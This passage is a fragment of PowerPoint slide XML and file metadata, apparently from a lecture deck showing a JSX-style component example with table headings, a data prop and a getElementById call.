              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>headings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>= {['When', 'Who', 'Description']}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>data = {data} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/&gt;,                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// self closing tag as XML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 err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>('container'));</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3951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1607</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>412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Administrator</cp:lastModifiedBy>
  <cp:revision>1463</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-02-15T15:40:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-20T04:45:57Z</dcterms:modified>
</cp:coreProperties>
</file>